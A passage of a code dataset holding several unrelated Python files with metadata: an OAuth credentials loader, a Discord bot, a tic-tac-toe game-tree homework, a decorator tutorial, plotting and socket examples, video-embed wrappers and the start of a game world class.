It must contain the following attributes.\n More information at https://api-docs.carto.com/.\n - api_base_url\n - client_id\n - client_secret\n \"\"\"\n with open(filepath, \"r\") as f:\n content = json.load(f)\n\n if \"api_base_url\" not in content:\n raise Exception(\"Missing attribute 'api_base_url'\")\n\n if \"client_id\" not in content:\n raise Exception(\"Missing attribute 'client_id'\")\n\n if \"client_secret\" not in content:\n raise Exception(\"Missing attribute 'client_secret'\")\n\n url = \"https://auth.carto.com/oauth/token\"\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n data = {\n \"grant_type\": \"client_credentials\",\n \"audience\": \"carto-cloud-native-api\",\n \"client_id\": content[\"client_id\"],\n \"client_secret\": content[\"client_secret\"],\n }\n response = requests.post(url, headers=headers, data=data)\n oauth_token = response.json()[\"access_token\"]\n\n return {\n \"apiVersion\": \"v3\",\n \"apiBaseUrl\": content[\"api_base_url\"],\n \"accessToken\": oauth_token,\n }\n","sub_path":"bindings/pydeck-carto/pydeck_carto/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"404451645","text":"s = list(input())\nk = int(input())\nans = 0\ncount = 1\nfor i in range(len(s)-1):\n if s[i] == s[i+1]:\n count += 1\n else:\n ans += count//2\n count = 1\nans += count//2\nif len(set(s)) == 1:\n print(len(s)*k//2)\n exit()\nif s[0] != s[-1]:\n ans *= k\nelse:\n left = 0\n right = 0\n index = 0\n while index < len(s) and s[0] == s[index]:\n left += 1\n index += 1\n index = len(s)-1\n while index >= 0 and s[-1] == s[index]:\n right += 1\n index -= 1\n ans *= k\n ans -= ((right//2) + (left//2) - (right + left)//2) * (k-1)\nprint(ans)","sub_path":"Python_codes/p02891/s509223332.py","file_name":"s509223332.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"604634910","text":"import os\n\nimport discord\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\n# from welcome_cog import WelcomeCog\nfrom appointments_cog import AppointmentsCog\nfrom armin import Armin\nfrom calmdown import Calmdown\nfrom christmas_cog import ChristmasCog\nfrom easter_cog import EasterCog\nfrom github import Github\nfrom help.help import Help\nfrom learninggroups import LearningGroups\nfrom links_cog import LinksCog\nfrom module_information.module_information import ModuleInformation\nfrom news_cog import NewsCog\nfrom poll_cog import PollCog\nfrom roles_cog import RolesCog\nfrom support_cog import SupportCog\nfrom text_commands_cog import TextCommandsCog\n# from change_log import ChangeLogCog\nfrom voice_cog import VoiceCog\nfrom welcome_cog import WelcomeCog\nfrom xkcd import Xkcd\n\n\n# .env file is necessary in the same directory, that contains several strings.\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = int(os.getenv('DISCORD_GUILD'))\nACTIVITY = os.getenv('DISCORD_ACTIVITY')\nOWNER = int(os.getenv('DISCORD_OWNER'))\nROLES_FILE = os.getenv('DISCORD_ROLES_FILE')\nHELP_FILE = os.getenv('DISCORD_HELP_FILE')\nCATEGORY_LERNGRUPPEN = os.getenv(\"DISCORD_CATEGORY_LERNGRUPPEN\")\nPIN_EMOJI = \"📌\"\n\nintents = discord.Intents.default()\nintents.members = True\nbot = commands.Bot(command_prefix='!', help_command=None, activity=discord.Game(ACTIVITY), owner_id=OWNER,\n intents=intents)\nbot.add_cog(AppointmentsCog(bot))\nbot.add_cog(TextCommandsCog(bot))\nbot.add_cog(PollCog(bot))\nbot.add_cog(RolesCog(bot))\nbot.add_cog(WelcomeCog(bot))\nbot.add_cog(ChristmasCog(bot))\nbot.add_cog(SupportCog(bot))\nbot.add_cog(NewsCog(bot))\nbot.add_cog(LinksCog(bot))\n# bot.add_cog(ChangeLogCog(bot))\nbot.add_cog(VoiceCog(bot))\nbot.add_cog(EasterCog(bot))\nbot.add_cog(Armin(bot))\nbot.add_cog(LearningGroups(bot))\nbot.add_cog(ModuleInformation(bot))\nbot.add_cog(Xkcd(bot))\nbot.add_cog(Help(bot))\nbot.add_cog(Calmdown(bot))\nbot.add_cog(Github(bot))\n\n\n\ndef get_reaction(reactions):\n \"\"\" Returns the reaction, that is equal to the specified PIN_EMOJI,\n or if that reaction does not exist in list of reactions, None will be returned\"\"\"\n\n for reaction in reactions:\n if reaction.emoji == PIN_EMOJI:\n return reaction\n return None\n\nasync def pin_message(message):\n \"\"\" Pin the given message, if it is not already pinned \"\"\"\n\n if not message.pinned:\n await message.pin()\n\n\nasync def unpin_message(message):\n \"\"\" Unpin the given message, if it is pinned, and it has no pin reaction remaining. \"\"\"\n\n if message.pinned:\n reaction = get_reaction(message.reactions)\n if reaction is None:\n await message.unpin()\n\n\n@bot.event\nasync def on_ready():\n print(\"Client started!\")\n\n\n@bot.event\nasync def on_raw_reaction_add(payload):\n if payload.user_id == bot.user.id:\n return\n\n if payload.emoji.name == PIN_EMOJI:\n channel = await bot.fetch_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n await pin_message(message)\n\n\n@bot.event\nasync def on_raw_reaction_remove(payload):\n if payload.emoji.name == PIN_EMOJI:\n channel = await bot.fetch_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n await unpin_message(message)\n\n\n@bot.event\nasync def on_voice_state_update(member, before, after):\n if before.channel != after.channel and after.channel and \"Lerngruppen-Voice\" in after.channel.name:\n category = await bot.fetch_channel(CATEGORY_LERNGRUPPEN)\n voice_channels = category.voice_channels\n\n for voice_channel in voice_channels:\n if len(voice_channel.members) == 0:\n return\n\n await category.create_voice_channel(f\"Lerngruppen-Voice-{len(voice_channels) + 1}\")\n\n\nbot.run(TOKEN)\n","sub_path":"fernuni_bot.py","file_name":"fernuni_bot.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"59854600","text":"import unittest\n\nfrom Home.Guidance.FlightPathSimFile import FlightPathSim\n\n\nKnots2MetersPerSecond = 0.514444444\n\n\nclass TestFlightPathSimFile(unittest.TestCase):\n\n def setUp(self) -> None:\n route_a320_charles_de_gaulle_lisbonne = \\\n 'ADEP/LFPG/26R-LAIGLE-ROLEN-PEPON-KURIS-TERPO-ERIGA-INBAB-ATLEN-' \\\n 'DEVAR-ASTURIAS-KUVAN-BISMU-BARKO-FATIMA-ADES/LPPT/03'\n waypoints = 'ROLEN-PEPON-KURIS-TERPO-ERIGA-INBAB'\n waypoints = 'ROLEN-TERPO-ATLEN-DEVAR-BISMU-FATIMA-ADES/LPPT/03'\n waypoints = 'LAMSO-EVELI-BASNO-PAMPUS-IVLUT-LUNIX-RENDI-EDUPO-NAPRO-DEPAD-AMOSU-MISGO-COLA-ROLIS-ADES/EDDF/25C'\n waypoints = 'LAMSO-EVELI-BASNO-PAMPUS-ADES/EDDF/25C'\n self.str_route = waypoints\n\n def test_flight_path(self):\n flight_path = FlightPathSim(\n route=self.str_route,\n aircraftICAOcode='A320',\n RequestedFlightLevel=330,\n cruiseMach=0.82,\n takeOffMassKilograms=68000.0,\n windSpeedMetersPerSecond=25*Knots2MetersPerSecond,\n windDirectionDegrees=25\n )\n\n self.assertEqual(type(flight_path), FlightPathSim)\n\n def test_flight_path_compute_flight(self):\n flight_path = FlightPathSim(\n route=self.str_route,\n aircraftICAOcode='A320',\n RequestedFlightLevel=330,\n cruiseMach=0.82,\n takeOffMassKilograms=68000.0,\n windSpeedMetersPerSecond=25*Knots2MetersPerSecond,\n windDirectionDegrees=25\n )\n\n # If we want to generate the whole flight using the old code, use the .computeFlight function\n flight_path.computeFlight(deltaTimeSeconds=1.0)\n flight_path.createFlightOutputFiles()\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"FlightDynamics/Home/tests_dir/tests_guidance/tests_flight_path_sim_file.py","file_name":"tests_flight_path_sim_file.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"317960792","text":"'''\nIl tris e' un popolarissimo gioco. Si gioca su una griglia quadrata di 3x3 caselle.\nA turno, i due giocatori scelgono una cella vuota e vi disegnano il proprio simbolo \n(un giocatore ha come simbolo una \"o\" e l'avversario una 'x'). \nVince il giocatore che riesce a disporre tre dei propri simboli in linea retta \norizzontale, verticale o diagonale. Se la griglia viene riempita \nsenza che nessuno dei giocatori sia riuscito a completare una linea \nretta di tre simboli, il gioco finisce in parita'. Nel caso in cui il gioco \nfinisse in parita', la partita e' detta \"patta\". \nPer convenzione a griglia vuota la prima mossa spetta sempre al giocatore 'o'\n\nUna configurazione del gioco e' dunque univocamente determinata dal contenuto della griglia.\n\nNel seguito assumiamo che il contenuto della griglia sia rappresentato tramite lista di liste.\nLa dimensione della lista di liste M e' 3x3 ed M[i][j] contiene '', 'x', o 'o' a seconda \nche la cella della griglia appartenente all'iesima riga e j-ma colonna sia ancora libera, \ncontenga il simbolo 'x' o contenga il simbolo 'o'. \n\nData una configurazione C del gioco, l'albero di gioco per C e' l'albero che \nsi ottiene ricorsivamente partendo dalla configurazione C e assegnando come figli le configurazioni \nche e' possibile ottenere da C con una mossa ulteriore del gioco. Ovviamente risulteranno \nfoglie dell'albero i possibili esiti della partita vale a dire le diverse configurazioni cui e' \npossibile arrivare partendo da C e che rappresentano patte, vittorie per 'o' o vittorie per 'x'.\nSe veda ad esempio l'immagine albero_di_gioco.png che mostra l' albero di gioco che si ottiene a partire \ndalla configurazione rappresentata da [['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\n \n\nSi consideri la seguente Classe di oggetti:\n\n\nclass NodoTris:\n def __init__(self, griglia):\n self.nome = griglia\n self.lista_figli = [] \n\n\nBisogna progettare le seguente funzione \n\ngen_tree(griglia)\nche, data la configurazione di gioco griglia, costruisce l'albero di gioco che si ottiene a partire \ndalla configurazione griglia e ne restituisce la radice. I nodi dell'albero devono essere\noggetti della classe NodoTris.\n\nPer testare la correttezza della vostra implementazione di gen_tree() il grade utilizzera' quattro metodi \ndella classe NodoTris che dovete comunque implementare: \n\n1)\ntipo(self)\nche, dato un nodo NodoTris, restituisce:\n 'o' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'o'\n 'x' se la configurazione rappresentata dal nodo e' una configurazione di vittoria per il giocatore 'x'\n '-' se la configurazione rappresentata dal nodo e' una configurazione di patta\n '?' se la configurazione rappresentata dal nodo e' una configurazione di gioco non ancora terminato\n\n2)\nesiti(self)\nche, dato un nodo radice di un albero di gioco, restituisce una tripla con i possibili \nesiti della partita che ha come configurazione iniziale quella rappresentata dal nodo. \nPiu' precisamente: il primo elemento della tripla e' il numero di patte possibili, \nil secondo e' il numero di possibili vittorie per il giocatore 'o' mentre il terzo elemento \ne' il numero di possibili vittorie per il giocatore 'x'.\n\n3)\nvittorie_livello(self, giocatore, h)\nche, dato un nodo radice di un albero di gioco, uno dei due giocatori ed un intero h,\nrestituisce il numero di nodi che rappresentano una vittoria per il giocatore e si \ntrovano ad altezza h nell'albero. In altri termini restituisce il numero di vittorie possibili \nin esattamente h mosse per il giocatore specificato, nella partita che ha come configurazione iniziale \nquella rappresentata dalla radice dell'albero.\n\n4)\nstrategia_vincente(self,giocatore)\nche, dato un nodo radice di un albero di gioco ed uno dei due giocatori, restituisce True o False. \nRestituisce True se giocatore ha una strategia vincente nella partita \nche ha come configurazione iniziale quella rappresentata dal nodo radice, False altrimenti.\n\nNota che un giocatore ha una strategia vincente rispetto ad una certa configurazione se, \nqualunque siano le mosse dell'avversario ha sempre la possibilita' di rispondere in modo \nche la partita termini con la sua vittoria.\n\nPotete ovviamente definire ulteriori funzioni e altri metodi per la Classe NodiTris \nse li ritenete utili al fine della risoluzione del compito.\n\nPotete assumere che le configurazioni di gioco rappresentate da griglia siano sempre configurazioni \nlecite (vale a dire ottenute dopo un certo numero di mosse a parire dalla griglia vuota).\n\n\nAVVERTENZE: non usare caratteri non ASCII, come le lettere accentate; non\nimportare moduli che non sono nella libreria standard.\n\nATTENZIONE: i test vengono eseguiti con un timeout globale di 2*N secondi (se il grader esegue N test).\n'''\n\nfrom copy import deepcopy\n\ng0=[['', '', ''], ['', '', ''], ['', '', '']]\ng1=[['x', 'o', 'o'], ['x', 'x', 'o'], ['', '', '']]\ng2=[['x', 'o', 'o'], ['x', 'x', 'o'], ['o', 'x', 'o']]\ng3=[['x', 'o', 'o'], ['x', 'x', 'o'], ['o', '', 'x']]\ng4=[['o', 'x', 'x'], ['x', 'o', 'o'], ['o', 'o', 'x']]\n\ndef fp(row):\n\trow = deepcopy(row)\n\tfor x in range(0, 3):\n\t\tif row[x] == '':\n\t\t\trow[x] = ' '\n\treturn row\n\t\ndef other(giocatore):\n\treturn ['o', 'x'][int(giocatore == 'o')]\n\t\t\nclass NodoTris:\n\tdef __countsymbols__(self, symbol):\n\t\treturn sum([row.count(symbol) for row in self.grid])\n\t\t\n\tdef __getCurrentPlayer__(self):\n\t\tocount, xcount = self.__countsymbols__('o'), self.__countsymbols__('x')\n\t\treturn ['x', 'o'][int(xcount >= ocount)]\n\t\n\tdef __assertGridDetails__(self):\n\t\tself.current_player = self.__getCurrentPlayer__() \n\t\tself.isIncomplete = False\n\t\tfor row in self.grid:\n\t\t\tif '' in row:\n\t\t\t\tself.isIncomplete = True\n\t\t\t\tbreak\n\t\t\t\t\n\tdef __test_horizontal_win__(self):\n\t\tfor row in self.grid:\n\t\t\t# print(\"analyzing row: {} | win: {} | set: {}\".format(row, len(set(row)) == 1 and not '' in row, set(row)))\n\t\t\tif len(set(row)) == 1 and not '' in row:\n\t\t\t\treturn row[0]\n\t\n\tdef __test_vertical_win__(self):\n\t\tfor col in range(0, 3):\n\t\t\tline = [self.grid[0][col], self.grid[1][col], self.grid[2][col]]\n\t\t\t# print(\"analyzing column: {} | win: {} | set: {}\".format(line, len(set(line)) == 1 and not '' in line, set(line)))\n\t\t\tif len(set(line)) == 1 and not '' in line:\n\t\t\t\treturn line[0]\n\t\t\t\t\n\tdef __test_diagonal_win__(self):\n\t\tline1 = [self.grid[0][0], self.grid[1][1], self.grid[2][2]]\n\t\tline2 = [self.grid[0][2], self.grid[1][1], self.grid[2][0]]\n\t\tif len(set(line1)) == 1 and not '' in line1:\n\t\t\treturn self.grid[0][0]\n\t\telif len(set(line2)) == 1 and not '' in line2:\n\t\t\treturn self.grid[0][2]\n\n\tdef __getTests__(self):\n\t\treturn [self.__test_horizontal_win__(), self.__test_vertical_win__(), self.__test_diagonal_win__()]\n\t\t\t\n\tdef __print__(self):\n\t\tprint(\"[{}\\n {}\\n {}] = {}, {}, {}\\n\".format(fp(self.grid[0]), fp(self.grid[1]), fp(self.grid[2]), self.tipo(), self.__getTests__(), self.depth))\n\t\n\tdef __init__(self, griglia, depth = 0):\n\t\tself.grid = griglia\n\t\tself.projections = [] # lista di NodoTris\n\t\tself.__assertGridDetails__()\n\t\tself.depth = depth\n\t\t\t\n\t\t# self.__print__()\n\t\tif self.tipo() == '?':\n\t\t\tfor ri, row in enumerate(self.grid):\n\t\t\t\tfor ci, cell in enumerate(row):\n\t\t\t\t\tif cell == '':\n\t\t\t\t\t\tnewgrid = deepcopy(griglia)\n\t\t\t\t\t\tnewgrid[ri][ci] = self.current_player\n\t\t\t\t\t\tself.projections += [NodoTris(newgrid, depth + 1)]\n\t\t\n\t#nonR \n\tdef tipo(self):\n\t\t# o, x, ?, - : winO, winX, ???, tie\n\t\ttests = self.__getTests__()\n\t\tif set(tests) == {None}:\n\t\t\treturn ['-', '?'][int(self.isIncomplete)]\n\t\telse:\n\t\t\treturn ['o', 'x'][int('x' in tests)]\n\t\t\n\t#R\n\tdef esiti(self):\n\t\towins, xwins, ties = 0, 0, 0\n\t\ttype = self.tipo()\n\t\towins += int(type == 'o')\n\t\txwins += int(type == 'x')\n\t\tties += int(type == '-')\n\t\t\n\t\tfor p in self.projections:\n\t\t\tproj_r = p.esiti()\n\t\t\tties += proj_r[0]\n\t\t\towins += proj_r[1]\n\t\t\txwins += proj_r[2]\n\t\t\n\t\treturn ties, owins, xwins\n\t\n\t\n\tdef __getAll__(self):\n\t\tproj = [] \n\t\tproj += self.projections\n\t\tfor p in self.projections:\n\t\t\tproj += p.__getAll__()\n\t\treturn proj\n\t\n\t#R\n\tdef vittorie_livello(self, giocatore, h):\n\t\t# quante vittorie per (['o','x']) al livello (int) ?\n\t\tprojections = self.__getAll__()\n\t\treturn len([p for p in self.__getAll__() if p.depth == h and p.tipo() == giocatore])\n\t\n\tdef __find_best_move__(self, plr):\n\t\tpaths = [path for path in self.__getAll__() if path.tipo() == plr]\n\t\tif paths:\n\t\t\tbest = paths[0]\n\t\t\tfor path in paths:\n\t\t\t\tif path.depth < best.depth:\n\t\t\t\t\tbest = path\n\t\t\treturn best\n\t\n\t#R\n\tdef strategia_vincente(self, giocatore):\n\t\tprint(giocatore, self.current_player, self.current_player is giocatore)\n\t\tif self.projections:\n\t\t\tif self.current_player is not giocatore:\n\t\t\t\t# loss_paths = [proj for proj in self.projections if proj.tipo() in ['?', other(giocatore)]]\n\t\t\t\tcertain_loss_paths = [proj for proj in self.projections if proj.tipo() == other(giocatore)]\n\t\t\t\t\n\t\t\t\tif certain_loss_paths:\n\t\t\t\t\tprint(\"---\")\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\tbest = self.__find_best_move__(self.current_player)\n\t\t\t\t\tworst = self.__find_best_move__(other(self.current_player))\n\t\t\t\t\treturn best.strategia_vincente(other(giocatore))\n\t\t\t\t\t# print(\"shortest loss is: \")\n\t\t\t\t\t# best.__print__()\n\t\t\t\t\t# print(\"shortest win is: \")\n\t\t\t\t\t# worst.__print__()\n\t\t\t\t#elif loss_paths:\n\t\t\t\t#\tfor path in loss_paths:\n\t\t\t\t#\t\tpath.__print__()\n\t\t\t\t#\t\treturn path.strategia_vincente(giocatore)\n\t\t\telse:\n\t\t\t\t# victory_paths = [proj for proj in self.projections if proj.tipo() in ['?', giocatore]]\n\t\t\t\tcertain_victory_paths = [proj for proj in self.projections if proj.tipo() == giocatore]\n\t\t\t\tif certain_victory_paths:\n\t\t\t\t\tprint(\"---\")\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\tbest = self.__find_best_move__(self.current_player)\n\t\t\t\t\tworst = self.__find_best_move__(other(self.current_player))\n\t\t\t\t\treturn worst.strategia_vincente(giocatore)\n\t\t\t\t\t# print(\"shortest win is: \")\n\t\t\t\t\t# best.__print__()\n\t\t\t\t\t# print(\"shortest loss is: \")\n\t\t\t\t\t# worst.__print__()\n\t\t\t\t# elif victory_paths:\n\t\t\t\t#\tfor path in victory_paths:\n\t\t\t\t#\t\tpath.__print__()\n\t\t\t\t#\t\treturn path.strategia_vincente(giocatore)\n\t\telse:\n\t\t\treturn self.tipo() == giocatore\n#R\t\t\ndef gen_tree(griglia):\n\t# griglia è una configurazione di gioco\n\treturn NodoTris(griglia)\n\t\n#x = gen_tree(g0)\n#print(\"generated: \", len(x.__getAll__()))\n#for n in range(10):\n#\tprint(x.vittorie_livello('o', n)) # print(\"l{}: {}\".format(n, x.vittorie_livello('o', n)))","sub_path":"students/1749703/homework04/program02.py","file_name":"program02.py","file_ext":"py","file_size_in_byte":10340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"614147126","text":"'''\n装饰器的进阶\n 1 functools.warps\n 2 带参数的装饰器\n 3 多个装饰装饰同一个函数\n\n装饰器的本质 : 闭包函数\n\n'''\n\n#装饰器作业三次登录\n\n# def login_check(f):\n# def inner(**kwargs):\n# count=0\n# while count<=3:\n# res=f(**kwargs)\n# if res==True:\n# print('login ok')\n# else:\n# print('login not ok')\n# count+=1\n# return inner\n#\n#\n# @login_check\n# def login_test(**kwargs):\n# if kwargs['username']=='yuan' and kwargs['username']:\n# if kwargs['pwd']=='nihao':\n# print('login success')\n# return True\n# else:\n# return False\n#\n# login_test(username='yuan',pwd='nihao')\n\n\n# 进阶版\nfrom functools import wraps\n# def login_check(f):\n# def inner(*args,**kwargs):\n# res=f(*args,**kwargs)\n# username=res[1]['username']\n# pwd=res[1]['pwd']\n# print('pwd',pwd)\n# with open('loginword',encoding='utf-8')as f1:\n# for i in f1:\n# print(i)\n# if username in i:\n# if i.split(\" \")[1].strip()==pwd:\n# print('login pass')\n# return True\n# else:\n# print('请输入正确密码')\n# return False\n# return inner\n#\n#\n# @login_check\n# def login(*args,**kwargs):\n# print(args,kwargs)\n# return args,kwargs\n#\n#\n# login(username='yuanbao',pwd='hanqing')\n\n\n# 为什么 装饰器函数要 加 *打散\nfrom functools import wraps\n# def outer(*args):\n# '''\n# 函数注释\n# .__doc__\n# :param args:\n# :return:\n# '''\n# print(args)\n# print(*args)\n#\n# def inner(*args):\n# print('inner>>',args)\n# inner(args)\n#\n# outer(1,2,3,4)\n# print(outer.__name__)#查看字符串格式的函数名\n# print(outer.__doc__)#查看函数的注释\n\n\n# from functools import wraps\n# def login_check(f):\n# # functools中提供的装饰器 如果不加则实际在调用被装饰函数的时候\n# #调用的是装饰器内的闭包函数,这一点可以只用.__name__方法验证\n# #但是如果加了 就是不会影响原函数\n# @wraps(f)\n# def inner(*args,**kwargs):\n# res=f(*args,**kwargs)\n# username=res[1]['username']\n# pwd=res[1]['pwd']\n# print('pwd',pwd)\n# with open('loginword',encoding='utf-8')as f1:\n# for i in f1:\n# print(i)\n# if username in i:\n# if i.split(\" \")[1].strip()==pwd:\n# print('login pass')\n# return True\n# else:\n# print('请输入正确密码')\n# return False\n# return inner\n#\n#\n# @login_check\n# def login(*args,**kwargs):\n# print(args,kwargs)\n# return args,kwargs\n#\n# login(username='yuanbao',pwd='hanqing')\n# print(login.__name__)\n\n\n\n'''\n带参数的装饰器 \n 本质是 装饰器又封装了一层外部函数 将flage穿进去 装饰器最多三层\n 并没有改变装饰器的原来的调用方式\n\n'''\n\nimport time\n# FlAGE=1\n# def timer_out(flag):\n# def timer(func):\n# def inner(*args,**kwargs):\n# if flag:\n# start=time.time()\n# ret=func(*args,**kwargs)\n# end=time.time()\n# print(end-start)\n# return ret\n# else:\n# ret=func(*args,**kwargs)\n# print('没有执行装饰器')\n# return ret\n# return inner\n# return timer\n\n\n#以下两句基本相等\n# timer=timer_out(FlAGE)\n# @timer\n# @timer_out(FlAGE)\n# def wahah():\n# time.sleep(0.1)\n# print('wahah')\n#\n#\n# wahah()\n\n'''\n多个装饰器装饰一个函数\n书:python核心编程\n\n如果有多个装饰器 那么就先执行最近的那个装饰器\n'''\n\n# def warper1(f):\n# def inner1():\n# print('start warper1')\n# res=f()\n# print('end inner1')\n# return res\n# return inner1\n#\n# def warper2(f):\n# def inner2():\n# print('start warper2')\n# res=f()\n# print('end inner2')\n# return res\n# return inner2\n#\n# def warper3(f):\n# def inner3():\n# print('start warper3')\n# res=f()\n# print('end inner3')\n# return res\n# return inner3\n# @warper3 #f=warper(f)>>>>waper3(inner2)==inner3\n# @warper2 #f=warper(f)>>>>waper2(inner1)==inner2\n# @warper1 #f=warper1(f)=inner1 最先执行\n# def func_01():\n# print(\"func_01\")\n# return '多层装饰器'\n#\n# func_01()\n\n\n#思考 如果同时使用2个装饰器 记录用户的登录情况 和 函数执行时间的先后顺序\nimport time\ndef login_time(f):\n def inner(*args,**kwargs):\n start=time.time()\n time.sleep(0.1)\n res=f(*args,**kwargs)\n end=time.time()\n print(end-start)\n return res\n return inner\n\ndef login_status(f):\n def inner(*args,**kwargs):\n print('判断登录状态')\n print(args,kwargs)\n result=f(*args,**kwargs)\n username=result[1]['name']\n pwd=result[1]['pwd']\n with open('loginword',encoding='utf-8')as f1:\n for i in f1:\n if username in i:\n listuser=i.strip().split()\n if username==listuser[0] and pwd==listuser[1]:\n print('login pass')\n return True\n else:\n print('请检查密码')\n return False\n\n return inner\n\n\n@login_time\n@login_status\ndef login(*args,**kwargs):\n print(\"login\",args,kwargs)\n return args,kwargs\n\nresult=login(name='yuan',pwd='nihao')\nprint(\"result\",result)","sub_path":"day12/day12a.py","file_name":"day12a.py","file_ext":"py","file_size_in_byte":5895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"273106152","text":"n = int(input(\"Enter no of rows = \"))\n\nfor row in range(1,n+1) :\n for col in range(1,n-row+2) :\n print(\"*\",end='')\n print()\n\nrow = 1 \nwhile row <= n :\n col = 1\n while col <= n-row+1:\n print(\"*\",end='')\n col += 1\n print()\n row += 1\n","sub_path":"Basic Python/pat2.py","file_name":"pat2.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"613040456","text":"import re\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nfrom registry import wrappers\n\n\n\nclass YoutubeWrapper(object):\n re_urls = (\n re.compile(r'http(s)?://(www.)?youtube.com/watch\\?v=(?P[^&]+).*$'),\n re.compile(r'http(s)?://(www.)?youtu.be/(?P.+)'),\n )\n\n def match_url(self, url):\n return bool(self.clean_url(url))\n\n def clean_url(self, url):\n for pattern in self.re_urls:\n match = pattern.match(url)\n if match:\n return 'http://www.youtube.com/embed/%(id)s' % match.groupdict()\n return None\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': self.clean_url(url),\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_youtube.html', ctx)\n\n\nclass FlowplayerWrapper(object):\n def match_url(self, url):\n return url.endswith('.flv')\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': url,\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_flowplayer.html', ctx)\n\n\nclass VimeoWrapper(object):\n re_urls = (\n re.compile(r\"^http(s)?://(www.)?vimeo.com/(?P\\d+)\"),\n )\n\n def match_url(self, url):\n return bool(self.clean_url(url))\n\n def clean_url(self, url):\n for pattern in self.re_urls:\n match = pattern.match(url)\n if match:\n return 'http://player.vimeo.com/video/%(id)s' % match.groupdict()\n return None\n\n def render(self, url, opts=None):\n ctx = {}\n ctx.update(opts or {})\n ctx.update({\n 'url': self.clean_url(url),\n 'MEDIA_URL': settings.MEDIA_URL,\n })\n\n return render_to_string('videoembed/embed_vimeo.html', ctx)\n\n\ndef register_default_wrappers():\n wrappers.register(YoutubeWrapper)\n wrappers.register(FlowplayerWrapper)\n wrappers.register(VimeoWrapper)\n","sub_path":"videoembed/default_wrappers.py","file_name":"default_wrappers.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"84018229","text":"import pandas as pd\nimport matplotlib.pyplot as plt\ndf = pd.read_csv('sales_data.csv')\nfacecream=df['facecream'].values\nfacewash=df['facewash'].values\ntoothpaste=df['toothpaste'].values\nbathingsoap=df['bathingsoap'].values\nshampoo=df['shampoo'].values\nmoisturizer=df['moisturizer'].values\nmonth_number=df['month_number'].values\nplt.figure()\nplt.plot(month_number,facecream,label='facecream',marker='o',linewidth=3)\nplt.plot(month_number,facewash,label='facewash',marker='o',linewidth=3)\nplt.plot(month_number,toothpaste,label='toothpast',marker='o',linewidth=3)\nplt.plot(month_number,bathingsoap,label='bathingsoap',marker='o',linewidth=3)\nplt.plot(month_number,shampoo,label='shampoo',marker='o',linewidth=3)\nplt.plot(month_number,moisturizer,label='moinsturizer',marker='o',linewidth=3)\nplt.xlabel('month number')\nplt.ylabel('products')\nplt.legend(loc='upper left')\nplt.xticks(month_number)\nplt.yticks([1e3,2e3,4e3,6e3,8e3,10e3,12e3,15e3,18e3])\nplt.grid(True,linewidth=0.5,linestyle='--')\nplt.title('company product')\nplt.savefig('sales_data_of_bathing_soap.png',dpi=150)\nplt.show()\n","sub_path":"lab2/set4/esercizio3.py","file_name":"esercizio3.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"63121439","text":"import socket\n\nhost = 'www.google.com'\nport = 80\nsize = 1024\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host,port))\nfile1stringcontent=\"GET / HTTP/1.1\\r\"\nfile1asciicontent = file1stringcontent.encode('ascii')\ns.send(file1asciicontent)\ndata = s.recv(size)\ns.close()\ndatastringcontent = data.decode('ascii')\nprint ('Received: '+ datastringcontent)","sub_path":"eclipse_workspace/DataCommAssignment1/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"244510928","text":"import random\nfrom MapTiles import *\n\nclass WorldClass(object):\n\t\"\"\"\n\tA world object to store the game tiles and the player's position\n\t\n\tVariables:\n\t\ttile_count \n\t\tplayer \n\t\tstarting_position (, )\n\t\tworldDictionary {(,) : }\n\t\tfillTiles []\n\t\tpossibleTilesSet {}\n\n\tMethods:\n\t\tgenerate_world() Used to generate the tiles if a new tile needs to be generated\n\t\tgame_over_room() Sets the player to the GameOverRoom game tile\n\t\tpick_new_tile() Used to add a tile to the fillTiles list\n\t\thow_many_tile() Returns variable tile_count\n\t\ttile_exists() Returns the tile for a given x,y coordinate\n\t\"\"\"\n\tdef __init__(self, player):\n\n\t\t# Used to keep track of how many tiles have been placed for adding new tiles and difficulty\n\t\tself.tile_count = 1\n\n\t\tself.player = player\n\n\t\t# A tuple holding the x,y grid coordinates\n\t\tself.starting_position = (0,0)\n\n\t\t# A dictionary to hold the maptiles making up the world\n\t\t# The a (,) tuple is the key representing the location\n\t\t# and 